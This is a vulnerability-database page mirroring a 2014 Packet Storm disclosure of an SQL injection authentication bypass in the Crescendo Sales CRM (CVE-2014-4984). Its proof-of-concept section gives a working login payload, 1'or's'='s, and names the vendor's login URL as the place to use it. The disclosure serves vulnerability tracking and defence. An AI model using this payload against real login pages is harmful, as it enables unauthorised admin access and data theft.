Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormMonendra SahuPACKETSTORM:127769
HistoryAug 06, 2014 - 12:00 a.m.

Crescendo - Sales CRM SQL Injection

2014-08-0600:00:00
Monendra Sahu
packetstormsecurity.com
20

0.02 Low

EPSS

Percentile

88.9%

JSON
`#################################################  
Crescendo - Sales CRM Authentication Bypass Vulnerability  
#################################################  
  
# Exploit Title: Crescendo - Sales CRM Authentication Bypass Vulnerability  
(Sql Injection)  
# Google Dork: N/A  
# Date: July 15 , 2014  
# Exploit Author: Monendra Sahu ( [email protected] )  
# Vendor Homepage: http://dejavuprotech.com/crecendo.php  
# Tested on:Windows  
# Browser Used : Google Chrome 35  
# CVE: CVE-2014-4984  
  
Vendor Information:  
  
"Déjà Vu has introduced Crescendo – Sales CRM. Targeted towards Small &  
Medium Enterprises, Crescendo is a low cost  
  
hosted application. Crescendo is instrumental in streamlining the sales  
processes like lead generation, lead tracking, lead  
  
management, account management and keeps top management informed about the  
sales pipeline. With user friendly  
  
interface, Crescendo comes with various MIS reports represented in tabular  
as well as graphical format. With the help of  
  
Crescendo companies can take better, faster and informed decisions.  
  
Crescendo - Sales CRM offers following modules:  
Leads Management  
Accounts Management  
Contacts Management  
Sales Forecasting  
Pipeline Management  
Teams Management  
Targets Managements  
Interactive Dashboards  
Graphical & MIS Reports  
  
Technologies employed for development of Crescendo - Sales CRM:  
Front End: Asp.Net, Vb.Net  
Database: MSSQL Server."  
  
  
#################################################  
Issue: SQL Injection, Authentication Bypass  
  
Risk level: High  
  
=> The remote attacker has the possibility to execute arbitrary SQL Code.  
  
=> The remote attacker is able to bypass the Admin authentication.  
  
Vulnerable Url : www.site.com/login.aspx  
  
-------------------------------------  
  
Exploit / Proof Of Concept:  
  
Perform a login with the following data:  
  
URL: http://www.crescendocrm.com/login.aspx  
  
  
Login Name:1'or's'='s  
Password:1'or's'='s  
  
You will be able to successfully login into admin panel  
  
-------------------------------------  
  
#################################################  
`

Related

zdt 1
prion 1
cvelist 1
nvd 1
cve 1
zdt
zdt
Crescendo - Sales CRM Authentication Bypass Vulnerability
2014-08-11 00:00:00
prion
prion
Sql injection
2020-01-10 13:15:00
cvelist
cvelist
CVE-2014-4984
2020-01-10 12:18:40
nvd
nvd
CVE-2014-4984
2020-01-10 13:15:12
cve
cve
CVE-2014-4984
2020-01-10 13:15:12

0.02 Low

EPSS

Percentile

88.9%

JSON
Related for PACKETSTORM:127769
zdt1prion1cvelist1nvd1cve1